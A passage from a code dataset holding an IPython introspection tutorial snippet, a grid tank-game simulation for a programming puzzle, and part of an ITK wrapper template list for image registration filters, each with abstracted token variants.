# Tab autocompletion work with wildcard character (*).
*Warning? # print all objects in namespace ending with Warning.
str.*find*? # print all str methods containing 'find' anywhere in name.
| [
"# Access documentation with '?':\n# All Python objects contain reference to their respecive docstrings.\n# The docstring is simply a brief description of what the object/method does.\nlen?\nhelp(len) # standard Python interface\n\nL = [1, 2, 3]\nL.insert? \nL? \n\n# The ? operator also works for functions we define ourselves.\ndef square(a):\n \"\"\"Return the square of a.\"\"\"\n return a ** 2\n\nhelp(square)\nsquare?\n\n# Accessing Source Code with '??':\n# In addition to the docstring, ?? yields source code if available.\nsquare??\n\n# Objects without source code are usually implemented in C or another language.\nlen??\n\n# Tab autocompletion work with wildcard character (*).\n*Warning? # print all objects in namespace ending with Warning.\nstr.*find*? # print all str methods containing 'find' anywhere in name.\n"
] | true |
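The code field of record 99,856 above is an IPython session: lines such as len?, square?? and str.*find*? are IPython introspection syntax rather than plain Python, which likely accounts for the error: true flag. As an illustrative aside, not part of the dataset, roughly equivalent introspection is available in plain Python through the standard inspect module.

# Illustrative plain-Python counterparts of the IPython '?' and '??' helpers above.
import inspect


def square(a):
    """Return the square of a."""
    return a ** 2


print(square.__doc__)             # roughly what square? reports (the docstring)
print(inspect.getsource(square))  # roughly what square?? reports (the source code)
print([name for name in dir(str) if 'find' in name])  # similar to str.*find*?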
99,857 | 5ce7213d5caa6ccf5f3a37b6c48d8966027601d2 | T = int(input())
def tank_command(s):
global H, W, tank_dir
if s == 'U':
if pos[0] > 0:
if board[pos[0] - 1][pos[1]] == '.':
board[pos[0]][pos[1]] = '.'
pos[0] -= 1
board[pos[0]][pos[1]] = '^'
tank_dir = '^'
elif s == 'D':
if pos[0] < H - 1:
if board[pos[0] + 1][pos[1]] == '.':
board[pos[0]][pos[1]] = '.'
pos[0] += 1
board[pos[0]][pos[1]] = 'v'
tank_dir = 'v'
elif s == 'R':
if pos[1] < W - 1:
if board[pos[0]][pos[1]+1] == '.':
board[pos[0]][pos[1]] = '.'
pos[1] += 1
board[pos[0]][pos[1]] = '>'
tank_dir = '>'
elif s == 'L':
if pos[1] > 0:
if board[pos[0]][pos[1]-1] == '.':
board[pos[0]][pos[1]] = '.'
pos[1] -= 1
board[pos[0]][pos[1]] = '<'
tank_dir = '<'
elif s == 'S':
if tank_dir == '>':
for i in range(pos[1] + 1, W):
if board[pos[0]][i] == '#':
break
elif board[pos[0]][i] == '*':
board[pos[0]][i] = '.'
break
elif tank_dir == '<':
for i in range(pos[1] - 1, -1, -1):
if board[pos[0]][i] == '#':
break
elif board[pos[0]][i] == '*':
board[pos[0]][i] = '.'
break
elif tank_dir == '^':
for i in range(pos[0] - 1, -1, -1):
if board[i][pos[1]] == '#':
break
elif board[i][pos[1]] == '*':
board[i][pos[1]] = '.'
break
elif tank_dir == 'v':
for i in range(pos[0] + 1, H):
if board[i][pos[1]] == '#':
break
elif board[i][pos[1]] == '*':
board[i][pos[1]] = '.'
break
data = ''
for tc in range(1, T + 1):
H, W = map(int, input().split())
board = []
for i in range(H):
board.append(list(input()))
tank_dir = ''
for i in range(W):
for j in range(H):
if board[j][i] in '><^v':
tank_dir = board[j][i]
pos = [j, i]
break
if tank_dir:
break
len_coms = int(input())
coms = input()
for com in coms:
tank_command(com)
ans = []
for line in board:
tmp = ''.join(line)
ans.append(tmp)
print(f'#{tc}', end=' ')
for each in ans:
print(each)
| [
"T = int(input())\n\n\ndef tank_command(s):\n global H, W, tank_dir\n\n if s == 'U':\n if pos[0] > 0:\n if board[pos[0] - 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] -= 1\n board[pos[0]][pos[1]] = '^'\n tank_dir = '^'\n elif s == 'D':\n if pos[0] < H - 1:\n if board[pos[0] + 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] += 1\n board[pos[0]][pos[1]] = 'v'\n tank_dir = 'v'\n elif s == 'R':\n if pos[1] < W - 1:\n if board[pos[0]][pos[1]+1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] += 1\n board[pos[0]][pos[1]] = '>'\n tank_dir = '>'\n elif s == 'L':\n if pos[1] > 0:\n if board[pos[0]][pos[1]-1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] -= 1\n board[pos[0]][pos[1]] = '<'\n tank_dir = '<'\n elif s == 'S':\n\n if tank_dir == '>':\n for i in range(pos[1] + 1, W):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '<':\n for i in range(pos[1] - 1, -1, -1):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '^':\n for i in range(pos[0] - 1, -1, -1):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n elif tank_dir == 'v':\n for i in range(pos[0] + 1, H):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n\n\ndata = ''\nfor tc in range(1, T + 1):\n H, W = map(int, input().split())\n\n board = []\n for i in range(H):\n board.append(list(input()))\n\n tank_dir = ''\n for i in range(W):\n for j in range(H):\n if board[j][i] in '><^v':\n tank_dir = board[j][i]\n pos = [j, i]\n break\n if tank_dir:\n break\n\n len_coms = int(input())\n coms = input()\n\n for com in coms:\n tank_command(com)\n\n ans = []\n for line in board:\n tmp = ''.join(line)\n ans.append(tmp)\n\n print(f'#{tc}', end=' ')\n for each in ans:\n print(each)\n",
"T = int(input())\n\n\ndef tank_command(s):\n global H, W, tank_dir\n if s == 'U':\n if pos[0] > 0:\n if board[pos[0] - 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] -= 1\n board[pos[0]][pos[1]] = '^'\n tank_dir = '^'\n elif s == 'D':\n if pos[0] < H - 1:\n if board[pos[0] + 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] += 1\n board[pos[0]][pos[1]] = 'v'\n tank_dir = 'v'\n elif s == 'R':\n if pos[1] < W - 1:\n if board[pos[0]][pos[1] + 1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] += 1\n board[pos[0]][pos[1]] = '>'\n tank_dir = '>'\n elif s == 'L':\n if pos[1] > 0:\n if board[pos[0]][pos[1] - 1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] -= 1\n board[pos[0]][pos[1]] = '<'\n tank_dir = '<'\n elif s == 'S':\n if tank_dir == '>':\n for i in range(pos[1] + 1, W):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '<':\n for i in range(pos[1] - 1, -1, -1):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '^':\n for i in range(pos[0] - 1, -1, -1):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n elif tank_dir == 'v':\n for i in range(pos[0] + 1, H):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n\n\ndata = ''\nfor tc in range(1, T + 1):\n H, W = map(int, input().split())\n board = []\n for i in range(H):\n board.append(list(input()))\n tank_dir = ''\n for i in range(W):\n for j in range(H):\n if board[j][i] in '><^v':\n tank_dir = board[j][i]\n pos = [j, i]\n break\n if tank_dir:\n break\n len_coms = int(input())\n coms = input()\n for com in coms:\n tank_command(com)\n ans = []\n for line in board:\n tmp = ''.join(line)\n ans.append(tmp)\n print(f'#{tc}', end=' ')\n for each in ans:\n print(each)\n",
"<assignment token>\n\n\ndef tank_command(s):\n global H, W, tank_dir\n if s == 'U':\n if pos[0] > 0:\n if board[pos[0] - 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] -= 1\n board[pos[0]][pos[1]] = '^'\n tank_dir = '^'\n elif s == 'D':\n if pos[0] < H - 1:\n if board[pos[0] + 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] += 1\n board[pos[0]][pos[1]] = 'v'\n tank_dir = 'v'\n elif s == 'R':\n if pos[1] < W - 1:\n if board[pos[0]][pos[1] + 1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] += 1\n board[pos[0]][pos[1]] = '>'\n tank_dir = '>'\n elif s == 'L':\n if pos[1] > 0:\n if board[pos[0]][pos[1] - 1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] -= 1\n board[pos[0]][pos[1]] = '<'\n tank_dir = '<'\n elif s == 'S':\n if tank_dir == '>':\n for i in range(pos[1] + 1, W):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '<':\n for i in range(pos[1] - 1, -1, -1):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '^':\n for i in range(pos[0] - 1, -1, -1):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n elif tank_dir == 'v':\n for i in range(pos[0] + 1, H):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n\n\n<assignment token>\nfor tc in range(1, T + 1):\n H, W = map(int, input().split())\n board = []\n for i in range(H):\n board.append(list(input()))\n tank_dir = ''\n for i in range(W):\n for j in range(H):\n if board[j][i] in '><^v':\n tank_dir = board[j][i]\n pos = [j, i]\n break\n if tank_dir:\n break\n len_coms = int(input())\n coms = input()\n for com in coms:\n tank_command(com)\n ans = []\n for line in board:\n tmp = ''.join(line)\n ans.append(tmp)\n print(f'#{tc}', end=' ')\n for each in ans:\n print(each)\n",
"<assignment token>\n\n\ndef tank_command(s):\n global H, W, tank_dir\n if s == 'U':\n if pos[0] > 0:\n if board[pos[0] - 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] -= 1\n board[pos[0]][pos[1]] = '^'\n tank_dir = '^'\n elif s == 'D':\n if pos[0] < H - 1:\n if board[pos[0] + 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] += 1\n board[pos[0]][pos[1]] = 'v'\n tank_dir = 'v'\n elif s == 'R':\n if pos[1] < W - 1:\n if board[pos[0]][pos[1] + 1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] += 1\n board[pos[0]][pos[1]] = '>'\n tank_dir = '>'\n elif s == 'L':\n if pos[1] > 0:\n if board[pos[0]][pos[1] - 1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] -= 1\n board[pos[0]][pos[1]] = '<'\n tank_dir = '<'\n elif s == 'S':\n if tank_dir == '>':\n for i in range(pos[1] + 1, W):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '<':\n for i in range(pos[1] - 1, -1, -1):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '^':\n for i in range(pos[0] - 1, -1, -1):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n elif tank_dir == 'v':\n for i in range(pos[0] + 1, H):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n\n\n<assignment token>\n<code token>\n",
"<assignment token>\n<function token>\n<assignment token>\n<code token>\n"
] | false |
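In record 99,857 above, the four movement branches of tank_command differ only in the direction delta and the symbol drawn, so the same logic is often written table-driven. The sketch below is an illustrative condensation of the movement branches only (shooting is omitted), is not part of the dataset, and its names are assumptions.

# Illustrative table-driven version of the movement branches (not part of the dataset).
MOVES = {'U': (-1, 0, '^'), 'D': (1, 0, 'v'), 'L': (0, -1, '<'), 'R': (0, 1, '>')}


def move(board, pos, command):
    # Move one cell only if the target is in bounds and flat ground ('.'), as in the record.
    dr, dc, symbol = MOVES[command]
    r, c = pos[0] + dr, pos[1] + dc
    if 0 <= r < len(board) and 0 <= c < len(board[0]) and board[r][c] == '.':
        board[pos[0]][pos[1]] = '.'
        pos[0], pos[1] = r, c
        board[r][c] = symbol
    return pos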
99,858 | d156e5ffd4fc8a463871dfcce00436aa047bf9c4 | depends = ('ITKPyBase', 'ITKRegistrationCommon', 'ITKFiniteDifference', )
templates = (
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS3IUS3IVF33', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF2IF2IVF42', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter', 'itkDemonsRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF33', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF2IF2IVF42', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('LevelSetMotionRegistrationFilter', 'itk::LevelSetMotionRegistrationFilter', 'itkLevelSetMotionRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('MultiResolutionPDEDeformableRegistration', 'itk::MultiResolutionPDEDeformableRegistration', 'itkMultiResolutionPDEDeformableRegistrationIF2IF2IVF22F', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >, 2 >, float'),
('MultiResolutionPDEDeformableRegistration', 'itk::MultiResolutionPDEDeformableRegistration', 'itkMultiResolutionPDEDeformableRegistrationIF3IF3IVF33F', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >, 3 >, float'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS2ISS2IVF22', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS3ISS3IVF23', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS2ISS2IVF32', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS3ISS3IVF33', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS2ISS2IVF42', True, 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterISS3ISS3IVF43', True, 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF22', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF23', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF32', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF33', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),
('PDEDeformableRegistrationFilter', 'itk::PDEDeformableRegistrationFilter', 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),
